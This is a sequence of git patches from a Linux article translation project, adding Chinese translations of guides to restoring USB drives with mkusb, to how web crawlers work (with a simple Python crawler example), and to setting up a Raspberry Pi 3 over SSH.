From 13250e6781bc1af89317142bc72506a61f6026e3 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Wed, 10 Jan 2018 23:38:51 +0800
Subject: [PATCH 223/371] Translated by Drshu
---
...ed USB Drive To Original State In Linux.md | 89 ----------------
...ed USB Drive To Original State In Linux.md | 100 ++++++++++++++++++
2 files changed, 100 insertions(+), 89 deletions(-)
delete mode 100644 sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
create mode 100644 translated/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
diff --git a/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md b/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
deleted file mode 100644
index 4c9fea02c0..0000000000
--- a/sources/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
+++ /dev/null
@@ -1,89 +0,0 @@
-Translating by Drshus
-
-Restore Corrupted USB Drive To Original State In Linux
-======
-
-![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/restore-corrupted-usb-drive-to-original-state-in-linux_orig.jpg)
-Many times our storage devices like sd cards and Pen drives get corrupted and unusable due to one or other reasons.
-
-It may be because of making a bootable media with that device , formatting via wrong platforms or creating partitions in that device.
-
-### Restore Corrupted USB Drive to Original state
-
- [![linux system disk manager](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/usb.png?1510665746)][1]
-
-Warning : The following procedure will format all your data from your device
-
-Whatever the reason, the final outcome is that we are not able to use that device.
-
-So here is a solution to restoring a corrupted usb drive or sd card to its original working state.
-
-Most of the times a simple format via the file browser solves the problem, But for extreme cases where the file manager isn’t helpful and you need your device working, you can follow this guide.
-
-We will be using a small tool called mkusb for this purpose. The installation is easy.
-
-Add the repository for mkusb.
-
-sudo add-apt-repository ppa:mkusb/ppa
-
-Now, Update your package lists.
-
-sudo apt-get update
-
-Install mkusb
-
-sudo apt-get install mkusb
-
-Now launch mkusb. You will get this prompt, click ‘Yes’.
-
- [![run mkusb dus](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/run-mkusb.png?1510498592)][2]
-
-Now mkusb will ask you one last time if you wish to proceed with the formatting of the data, ‘Stop’ will be selected by default. You now select ‘Go’ and click ‘OK’.
-
- [![linux mkusb](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/final-checkpoint_1.png?1510499627)][3]
-
-The window will close and your terminal will look like this.
-
- [![mkusb usb console](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/mkusb.png?1510499982)][4]
-
-In a few seconds, the process will be completed and you will get a window popup like this.
-
- [![restore corrupted usb drive](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/usb_1.png?1510500412)][5]
-
-You need to now remove the device from the system and plug it back in. Your device is Restored to a normal device and it will function properly like before.
-
- [![linux disk manager](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/usb_2.png?1510500457)][6]
-
-Now I know all of these could have been done via terminal commands, gparted or some other software etc. But that would require some level of knowledge about partition management.
-
-So it’s always good to have a small tool like this to automate the boring work for you.
-
-### Conclusion
-
-**mkusb**
-
-is a fairly easy to use program that can help you repair your usb storage devices and sd cards. It is available through the mkusb ppa as mkusb. All operations on mkusb will require superuser permissions and all your data on that device will be formatted.
-
-
-
-Once the operation is completed You will have to reattach the device to make it work.
-
-If you have any queries feel free to post them in the comments section below.
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxandubuntu.com/home/restore-corrupted-usb-drive-to-original-state-in-linux
-
-作者:[LINUXANDUBUNTU][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.linuxandubuntu.com
-[1]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb.png
-[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/run-mkusb.png
-[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/final-checkpoint_1.png
-[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mkusb.png
-[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb_1.png
-[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb_2.png
diff --git a/translated/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md b/translated/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
new file mode 100644
index 0000000000..71aa6d05ec
--- /dev/null
+++ b/translated/tech/20171114 Restore Corrupted USB Drive To Original State In Linux.md
@@ -0,0 +1,100 @@
+在 Linux 上恢复一个损坏的 USB 设备至初始状态
+======
+
+
+
+![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/restore-corrupted-usb-drive-to-original-state-in-linux_orig.jpg)
+
+很多时候,我们的 SD 卡和 U 盘这类存储设备会由于种种原因损坏而无法继续使用。
+
+这可能是因为用这个设备制作过引导盘、在错误的平台上进行过格式化,或者是在这个设备上创建过新的分区。
+
+### 恢复损坏的 USB 设备至初始状态
+
+ [![Linux 系统磁盘管理器](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/usb.png?1510665746)][1]
+
+警告:接下来的操作会将你设备上的所有数据格式化
+
+
+
+无论什么原因,最终的结果是我们无法继续使用这个设备。
+
+所以这里是一个恢复一个 USB 设备或者是 SD 卡到出厂状态的方法。
+
+大多数时候通过文件浏览器进行一次简单格式化可以解决问题,但是在一些极端情况下,比如文件管理器没有作用,而你又需要你的设备可以继续工作时,你可以使用下面的指导:
+
+我们将会使用一个叫做 mkusb 的小工具来实现目标,这个工具的安装非常简单。
+
+
+
+
+
+1. 添加 mkusb 的仓库
+
+`sudo add-apt-repository ppa:mkusb/ppa`
+
+2. 现在更新你的包列表
+
+`sudo apt-get update`
+
+3. 安装 mkusb
+
+`sudo apt-get install mkusb`
+
+现在运行 mkusb 你将会看到这个提示,点击 ‘Yes’。
+
+ [![运行 mkusb dus](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/run-mkusb.png?1510498592)][2]
+
+现在 mkusb 将会最后一次询问你是否希望继续格式化你的数据,‘Stop’是被默认选择的,你现在选择 ‘Go’并点击‘OK’。
+
+ [![Linux mkusb](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/final-checkpoint_1.png?1510499627)][3]
+
+窗口将会关闭,此时你的终端看起来是这样的。
+
+ [![mkusb usb 控制台](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/mkusb.png?1510499982)][4]
+
+在几秒钟之后,整个过程将会完成,并且你将看到一个这样的弹出窗口。
+
+
+
+ [![恢复损坏的 USB 设备](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/usb_1.png?1510500412)][5]
+
+你现在需要把你的设备从系统中弹出,然后重新插入。你的设备将被恢复为一个普通设备,并且能像原来一样正常工作。
+
+
+
+ [![Linux 磁盘管理器](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/usb_2.png?1510500457)][6]
+
+我们现在所做的操作本可以通过终端命令或是 gparted 或者其他的软件来完成,但是那将会需要一些关于分区管理的知识。
+
+所以,有一个像这样能替你自动完成这些繁琐工作的小工具,总是一件好事。
+
+### 结论
+
+**mkusb**
+
+是一个很容易使用的程序,它可以修复你的 USB 存储设备和 SD 卡。它可以通过 mkusb 的 PPA 安装。mkusb 的所有操作都需要超级用户权限,并且该设备上的所有数据都将被格式化。
+
+一旦操作完成,你需要重新插拔这个设备才能让它正常工作。
+
+如果你有任何疑问,欢迎随时在下面的评论区提出。
+
+
+
+--------------------------------------------------------------------------------
+
+via: http://www.linuxandubuntu.com/home/restore-corrupted-usb-drive-to-original-state-in-linux
+
+作者:[LINUXANDUBUNTU][a]
+译者:[Drshu](https://github.com/Drshu)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.linuxandubuntu.com
+[1]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb.png
+[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/run-mkusb.png
+[3]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/final-checkpoint_1.png
+[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/mkusb.png
+[5]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb_1.png
+[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/usb_2.png
From f2ef6ee1b50326e9d4e73fe08df6382bbbc97a57 Mon Sep 17 00:00:00 2001
From: geekpi
Date: Thu, 11 Jan 2018 08:50:35 +0800
Subject: [PATCH 224/371] translated
---
...Is A Web Crawler- How Web Crawlers work.md | 53 -------------------
...Is A Web Crawler- How Web Crawlers work.md | 50 +++++++++++++++++
2 files changed, 50 insertions(+), 53 deletions(-)
delete mode 100644 sources/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
create mode 100644 translated/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
diff --git a/sources/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md b/sources/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
deleted file mode 100644
index c364d38cde..0000000000
--- a/sources/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
+++ /dev/null
@@ -1,53 +0,0 @@
-translating----geekpi
-
-What Is A Web Crawler? How Web Crawlers work?
-======
-![](http://www.theitstuff.com/wp-content/uploads/2017/12/what-is-a-web-crawler-how-web-crawler-works.jpg)
-As an avid Internet junkie, you must have for once in your life come across the word **Web Crawler.** So what is a web crawler, who uses web crawler? How does it work? Let us talk about all of these things in this article.
-
-### **What is a Web Crawler?**
-
-[![web crawler source code sync][1]][1]
-
-A **web crawler** also known as a **web-spider** is an internet software or bot that browses the internet by visiting different pages of many websites. The web crawler retrieves various information from those web pages and stores them in its records. These crawlers are mostly used to gather content from websites to improve searches in a search engine.
-
-### **Who uses Web Crawlers?**
-
-Most search engines use crawlers to gather more and more content from publicly available websites so that they can provide more relevant content to their users.
-
-[![search engines use web crawlers][2]][2]
-
-A lot of commercial organizations use Web Crawlers to specifically search for email addresses and phone numbers of people so that they can later send them promotional offers and other schemes. This is basically spam, but that is how most companies create their mailing list.
-
-Hackers use Web Crawlers to find out all the files in a website's folder mostly HTML and Javascript files. They then try to exploit the website by using XSS.
-
-### **How does a Web Crawler work?**
-
-A Web-Crawler is an automated script which means all of its actions are predefined. A Crawler first begins with an initial list of URLs to visit, these URLs are called seeds. Then it identifies all the hyperlinks to other pages that are listed on the initial seed page. The web crawler then saves these web pages in form of HTML documents which are later worked upon by the search engine and an index is created.
-
-### **Web Crawler and SEO**
-
-Web Crawling affects SEO i.e Search Engine Optimization in a big way. With a major chunk of the users using Google, it is important to get the Google crawlers to index most of your site. This can be done in many ways including not using repeated content and having as many backlinks on other websites. A lot of websites have been seen to abuse these tricks and they eventually get blacklisted by the Engine.
-
-### **Robots.txt**
-
-The robots.txt file is a very special type of file that the crawlers look for when crawling your website. This file usually contains information on how to crawl your website. Some webmasters who purposely do not want their sites indexed can also prevent crawling by using the robots.txt file.
-
-### **Conclusion**
-
-So Crawlers are small software bots that can be used to browse a lot of websites and help the search engine to get the most relevant data from the web.
-
-
---------------------------------------------------------------------------------
-
-via: http://www.theitstuff.com/web-crawler-web-crawlers-work
-
-作者:[Rishabh Kandari][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.theitstuff.com/author/reevkandari
-[1]:http://www.theitstuff.com/wp-content/uploads/2017/12/crawler.jpeg
-[2]:http://www.theitstuff.com/wp-content/uploads/2017/12/sengine.png
diff --git a/translated/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md b/translated/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
new file mode 100644
index 0000000000..a5ddd333d9
--- /dev/null
+++ b/translated/tech/20171230 What Is A Web Crawler- How Web Crawlers work.md
@@ -0,0 +1,50 @@
+什么是网络爬虫?网络爬虫如何工作?
+======
+![](http://www.theitstuff.com/wp-content/uploads/2017/12/what-is-a-web-crawler-how-web-crawler-works.jpg)
+作为一个狂热的互联网人,你在生活中一定遇到过**网络爬虫**这个词。那么什么是网络爬虫,谁使用网络爬虫?它是如何工作的?让我们在本文中讨论这些。
+
+### **什么是网络爬虫?**
+
+[![web crawler source code sync][1]][1]
+
+**网络爬虫**也被称为**网络蜘蛛**,是一种会访问互联网上许多网站的不同页面的软件或机器人。网络爬虫从这些网页中检索各种信息,并将其存储在自己的记录中。这些抓取工具主要用于从网站收集内容,以改善搜索引擎的搜索结果。
+
+### **谁使用网络爬虫?**
+
+大多数搜索引擎使用爬虫来收集来自公共网站的越来越多的内容,以便他们可以向用户提供更多相关内容。
+
+[![search engines use web crawlers][2]][2]
+
+许多商业机构使用网络爬虫专门搜索人们的电子邮件地址和电话号码,以便他们可以向你发送促销优惠和其他方案。这基本上是垃圾邮件,但这是大多数公司创建邮件列表的方式。
+
+黑客使用网络爬虫来查找网站文件夹中的所有文件,主要是 HTML 和 Javascript。然后他们尝试通过使用 XSS 来攻击网站。
+
+### **网络爬虫如何工作?**
+
+网络爬虫是一个自动化脚本,它所有行为都是预定义的。爬虫首先从要访问的 URL 的初始列表开始,这些 URL 称为种子。然后它从初始的种子页面确定所有其他页面的超链接。网络爬虫然后将这些网页以 HTML 文档的形式保存,这些 HTML 文档稍后由搜索引擎处理并创建一个索引。
+
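+下面是一个极简的爬虫示意代码(并非原文内容,仅用 Python 标准库来演示“从种子 URL 出发、提取超链接、保存页面”这一流程;实际的爬虫还需要处理 robots.txt、去重、限速等问题):
+
+```
+# 极简网络爬虫示意:广度优先地访问页面并保存 HTML
+from collections import deque
+from html.parser import HTMLParser
+from urllib.parse import urljoin
+from urllib.request import urlopen
+
+class LinkParser(HTMLParser):
+    def __init__(self):
+        super().__init__()
+        self.links = []
+    def handle_starttag(self, tag, attrs):
+        if tag == "a":
+            for name, value in attrs:
+                if name == "href" and value:
+                    self.links.append(value)
+
+def crawl(seeds, max_pages=10):
+    queue, seen, pages = deque(seeds), set(seeds), {}
+    while queue and len(pages) < max_pages:
+        url = queue.popleft()
+        try:
+            html = urlopen(url, timeout=5).read().decode("utf-8", "ignore")
+        except Exception:
+            continue
+        pages[url] = html                      # 以 HTML 文档的形式保存页面
+        parser = LinkParser()
+        parser.feed(html)
+        for link in parser.links:              # 找出页面上列出的所有超链接
+            absolute = urljoin(url, link)
+            if absolute.startswith("http") and absolute not in seen:
+                seen.add(absolute)
+                queue.append(absolute)
+    return pages
+```
+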
+### **网络爬虫和 SEO**
+
+网络爬虫对 SEO,也就是搜索引擎优化(Search Engine Optimization)有很大的影响。由于大量用户使用 Google,让 Google 爬虫为你网站的大部分页面建立索引非常重要。这可以通过许多方式来实现,包括避免重复内容,以及在其他网站上获得尽可能多的反向链接。许多网站因为滥用这些技巧,最终被搜索引擎列入了黑名单。
+
+### **Robots.txt**
+
+robots.txt 是爬虫在抓取你的网站时寻找的一种非常特殊的文件。该文件通常包含有关如何抓取你的网站的信息。一些网站管理员故意不希望他们的网站被索引也可以通过使用 robots.txt 文件阻止爬虫。
+
+### **总结**
+
+爬虫是一个小的软件机器人,可以用来浏览很多网站,并帮助搜索引擎从网上获得最相关的数据。
+
+--------------------------------------------------------------------------------
+
+via: http://www.theitstuff.com/web-crawler-web-crawlers-work
+
+作者:[Rishabh Kandari][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.theitstuff.com/author/reevkandari
+[1]:http://www.theitstuff.com/wp-content/uploads/2017/12/crawler.jpeg
+[2]:http://www.theitstuff.com/wp-content/uploads/2017/12/sengine.png
From 5ac34f0f320da932664967cd21b1b05d9282dff3 Mon Sep 17 00:00:00 2001
From: geekpi
Date: Thu, 11 Jan 2018 08:54:19 +0800
Subject: [PATCH 225/371] translating
---
.../tech/20171016 Using the Linux find command with caution.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171016 Using the Linux find command with caution.md b/sources/tech/20171016 Using the Linux find command with caution.md
index 2093308d9f..bb43f2cd76 100644
--- a/sources/tech/20171016 Using the Linux find command with caution.md
+++ b/sources/tech/20171016 Using the Linux find command with caution.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
Using the Linux find command with caution
======
![](https://images.idgesg.net/images/article/2017/10/caution-sign-100738884-large.jpg)
From cffa610c60600f73671d82605c1d94d02677136d Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 09:25:55 +0800
Subject: [PATCH 226/371] Translating by qhwdw
---
sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
index 7a0e9b4805..f7e8913962 100644
--- a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
+++ b/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
@@ -1,3 +1,4 @@
+Translating by qhwdw
A beginner’s guide to Raspberry Pi 3
======
![](https://images.techhive.com/images/article/2017/03/raspberry2-100711632-large.jpeg)
From 60800318112bbd940467d3b34e67d706769c9bd5 Mon Sep 17 00:00:00 2001
From: Flowsnow
Date: Thu, 11 Jan 2018 10:16:33 +0800
Subject: [PATCH 227/371] =?UTF-8?q?=E7=94=B3=E8=AF=B7=E7=BF=BB=E8=AF=91-20?=
=?UTF-8?q?171107=20How=20To=20Protect=20Server=20Against=20Brute=20Force?=
=?UTF-8?q?=20Attacks=20With=20Fail2ban=20On=20Linux.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...erver Against Brute Force Attacks With Fail2ban On Linux.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md b/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
index 0a1a27855e..55e7a7d17a 100644
--- a/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
+++ b/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
@@ -1,5 +1,8 @@
+translating by Flowsnow
+
How To Protect Server Against Brute Force Attacks With Fail2ban On Linux
======
+
One of the important task for Linux administrator is to protect server against illegitimate attack or access. By default Linux system comes with well-configured firewall such as Iptables, Uncomplicated Firewall (UFW), ConfigServer Security Firewall (CSF), etc, which will prevent many kinds of attacks.
Any machine which is connected to the internet is a potential target for malicious attacks. There is a tool called fail2ban is available to mitigate illegitimate access on server.
From bb753fe78cc203c3da9c342ceb9fc1d45341c65c Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 10:56:06 +0800
Subject: [PATCH 228/371] Translated by qhwdw
---
.../tech/20170502 A beginner-s guide to Raspberry Pi 3.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {sources => translated}/tech/20170502 A beginner-s guide to Raspberry Pi 3.md (100%)
diff --git a/sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
similarity index 100%
rename from sources/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
rename to translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
From f63b188ef253ce2ab42cc8f29766b396d381d3ca Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 10:56:36 +0800
Subject: [PATCH 229/371] Translated by qhwdw
---
...02 A beginner-s guide to Raspberry Pi 3.md | 77 +++++++++----------
1 file changed, 38 insertions(+), 39 deletions(-)
diff --git a/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md b/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
index f7e8913962..b53c397aed 100644
--- a/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
+++ b/translated/tech/20170502 A beginner-s guide to Raspberry Pi 3.md
@@ -1,103 +1,102 @@
-Translating by qhwdw
-A beginner’s guide to Raspberry Pi 3
+一个树莓派 3 的新手指南
======
![](https://images.techhive.com/images/article/2017/03/raspberry2-100711632-large.jpeg)
-This article is part of a weekly series where I'll create new projects using Raspberry Pi 3. The first article of the series focusses on getting you started and will cover the installation of Raspbian, with PIXEL desktop, setting up networking and some basics.
+这篇文章是我使用树莓派 3 创建新项目的每周系列文章的一部分。该系列的第一篇文章专注于入门,主要讲解如何安装带有 PIXEL 桌面的 Raspbian、设置网络以及其它一些基础配置。
-### What you need:
+### 你需要:
- * A Raspberry Pi 3
- * A 5v 2mAh power supply with mini USB pin
- * Micro SD card with at least 8GB capacity
- * Wi-Fi or Ethernet cable
- * Heat sink
- * Keyboard and mouse
- * a PC monitor
- * A Mac or PC to prepare microSD card.
+ * 一台树莓派 3
+ * 一个 5V 2A 的 Micro USB 电源适配器
+ * 至少 8GB 容量的 Micro SD 卡
+ * Wi-Fi 或者以太网线
+ * 散热片
+ * 键盘和鼠标
+ * 一台 PC 显示器
+ * 一台用于准备 microSD 卡的 Mac 或者 PC
-There are many Linux-based operating systems available for Raspberry Pi that you can install directly, but if you're new to the Pi, I suggest NOOBS, the official OS installer for Raspberry Pi that simplifies the process of installing an OS on the device.
+现在市面上有很多基于 Linux 操作系统的树莓派,这种树莓派你可以直接安装它,但是,如果你是第一次接触树莓派,我推荐使用 NOOBS,它是树莓派官方的操作系统安装器,它安装操作系统到设备的过程非常简单。
-Download NOOBS from [this link][1] on your system. It's a compressed .zip file. If you're on MacOS, just double click on it and MacOS will automatically uncompress the files. If you are on Windows, right-click on it, and select "extract here."
+在你的电脑上从 [这个链接][1] 下载 NOOBS。它是一个 zip 压缩文件。如果你使用的是 MacOS,可以直接双击它,MacOS 会自动解压这个文件。如果你使用的是 Windows,右键单击它,选择“解压到这里”。
-If you're running desktop Linux, then how to unzip it really depends on the desktop environment you are running, as different DEs have different ways of doing the same thing. So the easiest way is to use the command line.
+如果你运行的是 Linux,如何去解压 zip 文件取决于你的桌面环境,因为,不同的桌面环境下解压文件的方法不一样,但是,使用命令行可以很容易地完成解压工作。
`$ unzip NOOBS.zip`
-Irrespective of the operating system, open the unzipped file and check if the file structure looks like this:
+不管它是什么操作系统,打开解压后的文件,你看到的应该是如下图所示的样子:
![content][3] Swapnil Bhartiya
-Now plug the Micro SD card to your PC and format it to the FAT32 file system. On MacOS, use the Disk Utility tool and format the Micro SD card:
+现在,在你的 PC 上插入 Micro SD 卡,将它格式化成 FAT32 格式的文件系统。在 MacOS 上,使用磁盘实用工具去格式化 Micro SD 卡:
![format][4] Swapnil Bhartiya
-On Windows, just right click on the card and choose the formatting option. If you're on desktop Linux, different DEs use different tools, and covering all the DEs is beyond the scope of this story. I have written a tutorial [using the command line interface on Linux][5] to format an SD card with Fat32 file system.
+在 Windows 上,只需要右键单击这个卡,然后选择“格式化”选项。如果是在 Linux 上,不同的桌面环境使用不同的工具,就不一一去讲解了。在这里我写了一个教程,[在 Linux 上使用命令行接口][5] 去格式化 SD 卡为 Fat32 文件系统。
-Once you have the card formatted in the Fat32 partition, just copy the content of the downloaded NOOBS directory into the root directory of the device. If you are on MacOS or Linux, just rsync the content of NOOBS to the SD card. Open Terminal app in MacOS or Linux and run the rsync command in this format:
+在你拥有了 FAT32 格式的文件系统后,就可以去拷贝下载的 NOOBS 目录的内容到这个卡的根目录下。如果你使用的是 MacOS 或者 Linux,可以使用 rsync 将 NOOBS 的内容传到 SD 卡的根目录中。在 MacOS 或者 Linux 中打开终端应用,然后运行如下的 rsync 命令:
`rsync -avzP /path_of_NOOBS /path_of_sdcard`
-Make sure to select the root directory of the sd card. In my case (on MacOS), it was:
+一定要确保选择了 SD 卡的根目录,在我的案例中(在 MacOS 上),它是:
`rsync -avzP /Users/swapnil/Downloads/NOOBS_v2_2_0/ /Volumes/U/`
-Or you can copy and paste the content. Just make sure that all the files inside the NOOBS directory are copied into the root directory of the Micro SD Card and not inside any sub-directory.
+或者你也可以拷贝粘贴 NOOBS 目录中的内容。一定要确保将 NOOBS 目录中的内容全部拷贝到 Micro SD 卡的根目录下,千万不能放到任何的子目录中。
-Now plug the Micro SD Card into the Raspberry Pi 3, connect the monitor, the keyboard and power supply. If you do have wired network, I recommend using it as you will get faster download speed to download and install the base operating system. The device will boot into NOOBS that offers a couple of distributions to install. Choose Raspbian from the first option and follow the on-screen instructions.
+现在可以插入这张 Micro SD 卡到树莓派 3 中,连接好显示器、键盘鼠标和电源适配器。如果你拥有有线网络,我建议你使用它,因为有线网络下载和安装操作系统更快。树莓派将引导到 NOOBS,它会列出可供安装的几个发行版。在第一个选项中选择 Raspbian,然后按照屏幕上的指示操作,紧接着会出现如下图的画面。
![raspi config][6] Swapnil Bhartiya
-Once the installation is complete, Pi will reboot, and you will be greeted with Raspbian. Now it's time to configure it and run system updates. In most cases, we use Raspberry Pi in headless mode and manage it remotely over the networking using SSH. Which means you don't have to plug in a monitor or keyboard to manage your Pi.
+在你安装完成后,树莓派将重新启动,你将会看到一个欢迎使用树莓派的画面。现在可以去配置它,并且去运行系统更新。大多数情况下,我们都是在没有外设的情况下使用树莓派的,都是使用 SSH 基于网络远程去管理它。这意味着你不需要为了管理树莓派而去为它接上鼠标键盘和显示器。
-First of all, we need to configure the network if you are using Wi-Fi. Click on the network icon on the top panel, and select the network from the list and provide it with the password.
+开始使用它的第一步是,配置网络(假如你使用的是 Wi-Fi)。点击顶部面板上的网络图标,然后在出现的网络列表中,选择你要配置的网络并为它输入正确的密码。
![wireless][7] Swapnil Bhartiya
-Congrats, you are connected wirelessly. Before we proceed with the next step, we need to find the IP address of the device so we can manage it remotely.
+恭喜您,无线网络的连接配置完成了。在进入下一步的配置之前,你需要找到你的网络为树莓派分配的 IP 地址,因为远程管理会用到它。
-Open Terminal and run this command:
+打开一个终端,运行如下的命令:
`ifconfig`
-Now, note down the IP address of the device in the wlan0 section. It should be listed as "inet addr."
+现在,记下这个设备的 wlan0 部分的 IP 地址,它一般显示为 “inet addr”。
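+如果系统里没有 ifconfig,也可以用 iproute2 的命令查看(示意;输出中 inet 后面的地址即为 IP 地址):
+`ip addr show wlan0`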
-Now it's time to enable SSH and configure the system. Open the terminal on Pi and open raspi-config tool.
+现在,可以去启用 SSH 了,在树莓派上打开一个终端,然后打开 raspi-config 工具。
`sudo raspi-config`
-The default user and password for Raspberry Pi is "pi" and "raspberry" respectively. You'll need the password for the above command. The first option of Raspi Config tool is to change the default password, and I heavily recommend changing the password, especially if you want to use it over the network.
+树莓派的默认用户名和密码分别是 “pi” 和 “raspberry”。在上面的命令中你会被要求输入密码。树莓派配置工具的第一个选项是去修改默认密码,我强烈推荐你修改默认密码,尤其是你基于网络去使用它的时候。
-The second option is to change the hostname, which can be useful if you have more than one Pi on the network. A hostname makes it easier to identify each device on the network.
+第二个选项是去修改主机名,如果在你的网络中有多个树莓派时,主机名用于区分它们。一个有意义的主机名可以很容易在网络上识别每个设备。
-Then go to Interfacing Options and enable Camera, SSH, and VNC. If you're using the device for an application that involves multimedia, such as a home theater system or PC, then you may also want to change the audio output option. By default the output is set to HDMI, but if you're using external speakers, you need to change the set-up. Go to the Advanced Option tab of Raspi Config tool, and go to Audio. There choose 3.5mm as the default out.
+然后进入到接口选项,去启用摄像头、SSH、以及 VNC。如果你在树莓派上使用了一个涉及到多媒体的应用程序,比如,家庭影院系统或者 PC,你也可以去改变音频输出选项。缺省情况下,它的默认输出到 HDMI 接口,但是,如果你使用外部音响,你需要去改变音频输出设置。转到树莓派配置工具的高级配置选项,选择音频,然后选择 3.5mm 作为默认输出。
-[Tip: Use arrow keys to navigate and then Enter key to choose. ]
+[小提示:使用箭头键去导航,使用回车键去选择]
-Once all these changes are applied, the Pi will reboot. You can unplug the monitor and keyboard from your Pi as we will be managing it over the network. Now open Terminal on your local machine. If you're on Windows, you can use Putty or read my article to install Ubuntu Bash on Windows 10.
+一旦所有的改变被应用, 树莓派将要求重新启动。你可以从树莓派上拔出显示器、鼠标键盘,以后可以通过网络来管理它。现在可以在你的本地电脑上打开终端。如果你使用的是 Windows,你可以使用 Putty 或者去读我的文章 - 怎么在 Windows 10 上安装 Ubuntu Bash。
-Then ssh into your system:
+在你的本地电脑上输入如下的 SSH 命令:
`ssh pi@IP_ADDRESS_OF_Pi`
-In my case it was:
+在我的电脑上,这个命令是这样的:
`ssh pi@10.0.0.161`
-Provide it with the password and Eureka!, you are logged into your Pi and can now manage the device from a remote machine. If you want to manage your Raspberry Pi over the Internet, read my article on [enabling RealVNC on your machine][8].
+输入它的密码,你登入到树莓派了!现在你可以从一台远程电脑上去管理你的树莓派。如果你希望通过因特网去管理树莓派,可以去阅读我的文章 - [如何在你的计算机上启用 RealVNC][8]。
-In the next follow-up article, I will talk about using Raspberry Pi to manage your 3D printer remotely.
+在该系列的下一篇文章中,我将讲解使用你的树莓派去远程管理你的 3D 打印机。
-**This article is published as part of the IDG Contributor Network.[Want to Join?][9]**
+**这篇文章是作为 IDG 投稿网络的一部分发表的。[想加入吗?][9]**
--------------------------------------------------------------------------------
